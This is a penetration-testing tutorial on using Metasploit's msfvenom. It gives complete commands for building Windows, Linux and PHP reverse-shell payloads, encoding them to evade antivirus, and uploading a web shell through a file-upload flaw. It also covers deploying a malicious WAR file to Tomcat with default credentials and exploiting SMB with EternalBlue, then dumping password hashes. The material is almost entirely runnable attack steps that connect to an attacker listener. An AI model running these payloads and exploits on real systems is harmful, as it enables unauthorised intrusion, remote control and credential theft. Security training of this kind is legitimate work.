Skip to content

07. Metasploit Custom Payload with msfvenom

1. Creating a Custom Payload with msfvenom

msfvenom is a powerful tool for creating payloads in various formats. Here's how to craft custom payloads.

Scenario: Windows Reverse Shell

  1. Generate Basic Reverse Shell Payload:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o reverse_shell.exe
    • -p windows/meterpreter/reverse_tcp: Specifies the payload type.
    • LHOST/LPORT: IP and port of the attacker (listener).
    • -f exe: Output format (exe for Windows executable).
    • -o reverse_shell.exe: Save the file as reverse_shell.exe.
    • Add Obfuscation: Encode the payload to bypass antivirus:
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 5 -o encoded_reverse_shell.exe
    • -e x86/shikata_ga_nai: Encoding mechanism.
    • -i 5: Apply encoding 5 times.

    • Serve the Payload:

    • Host the payload on an HTTP server:

      python3 -m http.server 8080

  2. Set Up a Listener in Metasploit:

    use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
exploit

  3. Execute the Payload: Once the target downloads and runs encoded_reverse_shell.exe, you'll get a Meterpreter session.

2. Advanced Payload for Linux

Scenario: Linux Reverse Shell

  1. Generate Reverse Shell Payload:

    msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f elf -o shell.elf
    • -f elf: Creates an ELF binary for Linux systems.
    • Set Up Listener:
    use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
exploit

  2. Deploy Payload:

    • Transfer shell.elf to the Linux target.

    • Execute:

      chmod +x shell.elf
./shell.elf

3. Exploiting a Web Server

Scenario: Custom PHP Reverse Shell

  1. Create a PHP Reverse Shell Payload:

    msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f raw > shell.php

  2. Customize Payload: Add PHP tags around the payload:

    echo "<?php " | cat - shell.php > final_shell.php

  3. Upload the Payload: Use a file upload vulnerability in the web application to upload final_shell.php.

  4. Set Up Listener:

    use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
exploit

  5. Trigger Payload: Visit the uploaded PHP file in the browser to execute it:

    http://192.168.1.200/uploads/final_shell.php

4. Using Specific Modules for Unique Scenarios

Example: Apache Tomcat Manager Upload

  1. Scenario: Exploiting default credentials on an Apache Tomcat Manager to deploy a malicious WAR file.

  2. Steps:

    1. Search for the exploit:

      search tomcat

    2. Select the module:

      use exploit/multi/http/tomcat_mgr_upload

    3. Set options:

      set RHOST 192.168.1.200    # Target server
set RPORT 8080             # Default Tomcat port
set HTTPUSERNAME admin     # Default username
set HTTPPASSWORD password  # Default password

    4. Set payload:

      set payload java/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444

    5. Exploit:

      exploit

5. Exploiting SMB with EternalBlue

Scenario:

Targeting a Windows machine vulnerable to SMB (CVE-2017-0143).

  1. Load the Exploit:

    use exploit/windows/smb/ms17_010_eternalblue

  2. Configure Options:

    set RHOST 192.168.1.100
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444

  3. Run the Exploit:

    exploit

  4. Post-Exploitation:

    • Dump system information:

      sysinfo

    • Dump user hashes:

      hashdump